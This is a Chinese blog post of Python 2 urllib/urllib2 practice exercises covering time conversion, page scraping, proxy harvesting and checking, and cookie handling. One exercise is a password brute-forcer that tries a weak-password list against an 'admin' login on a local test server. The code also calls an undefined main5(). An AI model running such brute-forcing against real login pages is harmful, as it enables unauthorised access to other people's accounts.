• python例子-urllib,urllib2练习题合集.


    #!/usr/bin/python
    #coding:utf-8
    import time
    import urllib
    import urllib2
    from bs4 import BeautifulSoup
    import re
    import cookielib
    
    def main0():
        unix_timenow = int(time.time())
        print '当前时间:%d' % unix_timenow
    
        timenow = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(unix_timenow))
        print '当前标准时间:%s' % timenow
    
        time.sleep(3)
        unixtime = time.mktime(time.strptime(timenow,'%Y-%m-%d %H:%M:%S'))
        print 'unix时间:%s' % unixtime
    
    #1.将2015-1-16 12:00:00转化为unix时间,并计算此时间3天前的格式化时间和unix时间。
    def main1():
        time1 = '2015-1-16 12:00:00'
        unixtime1 = time.mktime(time.strptime(time1,'%Y-%m-%d %H:%M:%S'))
        print '1:unix时间戳:%s' % unixtime1
    
        unixtime2 = unixtime1 - 60*60*24*3
        print '1:3天前时间戳:%s' % unixtime2
        time2 = time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(unixtime2))
        print '1:3天前格式化时间:%s' % time2
    
    #2、使用urllib访问百度首页,取得百度的title、返回状态码、内容长度、cookie值等信息。
    def main2():
        url = 'http://www.baidu.com'
        response = urllib.urlopen(url)
        headers = response.info()
        cookie = headers['Set-Cookie']        #如果有多个cookie.则一次性读完.                        
        html = response.read()                #就是一个str类型的html源码
        soup = BeautifulSoup(html)
        title = soup.title.string
        statucode = response.getcode()
        htmlLength = len(html)
        print 'title:%s
    status:%s
    contentlength:%s
    cookie:%s' % (title,statucode,htmlLength,cookie)
    
    # 3、使用urllib访问http://www.cz88.net/proxy/index.shtml取得代理服务器的IP地址。
    def main3():
        url = 'http://www.cz88.net/proxy/index.shtml'
        response = urllib.urlopen(url)
        html = response.read()
        soup_html = BeautifulSoup(html)
        ip_div = soup_html.find_all('div',class_='box694')
        pattern = re.compile('<li><div class="ip">(.*?)</div><div class="port">(.*?)</div><div class="type">(.*?)</div><div class="addr".*?>(.*?)</div></li>')
        fwip = open('proxy_ip.txt','w')
        for i in ip_div[0].ul:
            #print 'i:%s' % i
            items = re.findall(pattern,str(i))
            if items != [] :
                #print 'items:%s' % items
                li = list(items[0])
                if li[0] != 'IP':
                     fwip.write(','.join(li)+'
    ')
        fwip.close()
    
    # 4、urllib2模块练习
    # 使用weak_passwd.txt弱口令文件,暴力破解http://127.0.0.1/www/Login/index.html用户名和密码。
    def main4():
        fo = open('weak_passwd.txt','r')
        pass_list = fo.readlines()
        for i in pass_list:
            i = i.strip()
            isok = post('admin',i)
            if isok:
                print 'pasword:%s' % i
                return
        fo.close()
    
    def post(name,pwd):
        data = urllib.urlencode({"username":name,"password":pwd});
        content_length = len(data)
        headers = {
            "Host":"192.168.2.150",
            "Pragma":"no-cache",
            "Content-Length":content_length,
            "Accept": "text/html, application/xhtml+xml, */*",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; NMJB; rv:11.0) like Gecko",
            "Content-Type": "application/x-www-form-urlencoded",
            "Referer": "http://192.168.1.139/www/Login/index.html",
            "Cookie": "thinkphp_show_page_trace=0|0; PHPSESSID=dbg5jjc9t76njqp6bimk43hjr4",
            }
            # Client = httplib.HTTPConnection("192.168.1.139",80,timeout=5)
            # Client.request("POST","/www/Login/login/",parames,headers)
            # response = Client.getresponse()
        
        url = 'http://192.168.1.139/www/Login/login/'
        request = urllib2.Request(url,data,headers)
        response = urllib2.urlopen(request)
        if response.geturl() == 'http://192.168.1.139/www/Show/index.html':    #根据不同的网站需要判断不同的登陆成功方式
            return True
        else:
            return False
    
    # 5、urllib2模块代理使用练习
    #    将练习题3中得到的代理保存在文件中,使用urllib2的代理模块验证哪些代理是可用的。
    def main6():
        proxy = 'proxy_ip.txt'
        proxy_list = open(proxy,'r').readlines()
        available_ip = []
        ip_tuple = None
        for i in proxy_list:
            i = i.split(',')
            isok = testProxy(i[0],i[1])
            if isok:
                available_ip.append((i[0],i[1]));
        for j in available_ip:
            print "available's IP is %s:%s" % (j[0],j[1])
    
    def testProxy(ip,port):
        #proxyip = 'http://%s:%s@%s' % (user, passwd, proxyserver)
        proxyip = 'http://%s:%s' % (ip,port)
        proxy_handler = urllib2.ProxyHandler({'http':proxyip})     #创建urllib2的ProxyHandler处理对象
        opener = urllib2.build_opener(proxy_handler)
        request = urllib2.Request('http://www.baidu.com')
        try:
            response = opener.open(request,timeout=5)
            statu = response.getcode()
            if statu == 200:
                return True
            else:
                return False
        except Exception, e:
            pass
        else:
            return False
        
    #6.cookielib模块的使用
    def main7():
        #cookiefile = 'cookie.txt'    #本地要保存的cookie文件名
        #cookie = cookielib.MozillaCookieJar(cookiefile)     #传入本地cookie文件名生成cookie对象.
        #cookie = cookielib.MozillaCookieJar()            #加载本地文件中的cookie时用此语句创建cookie对象
        #cookie.load(cookiefile)        #加载本地文件对象中cookie.
        cookie = cookielib.CookieJar()    #默认cookie创建方式
        cookie_handler = urllib2.HTTPCookieProcessor(cookie)    #将cookie对象加入HTTP中
        opener = urllib2.build_opener(cookie_handler)        #创建HTTP请求处理对象Handler
        url = "http://www.qq.com"
        request = urllib2.Request(url)
        response = opener.open(request,timeout=5)
        print response.getcode()
    
    if __name__ == '__main__':
        # main0()
        # main1()
        # main2()
        main3()
        # main4()
        main5()
        # main6()
  • 相关阅读:
    【Codeforces Round #645 (Div. 2) F】 Tasty Cookie
    【Codeforces Round #645 (Div. 2) E】 Are You Fired?
    【Educational Codeforces Round 88 (Rated for Div. 2) C】 Mixing Water
    20191114-4 Beta发布用户使用报告
    20191114-3 Beta阶段贡献分配
    beta发布
    20191107-1 每周例行报告
    beta 2/2 阶段中间产物提交入口
    beta week 2/2 Scrum立会报告+燃尽图 07
    beta week 2/2 Scrum立会报告+燃尽图 06
  • 原文地址:https://www.cnblogs.com/xccnblogs/p/4888186.html
Copyright © 2020-2023  润新知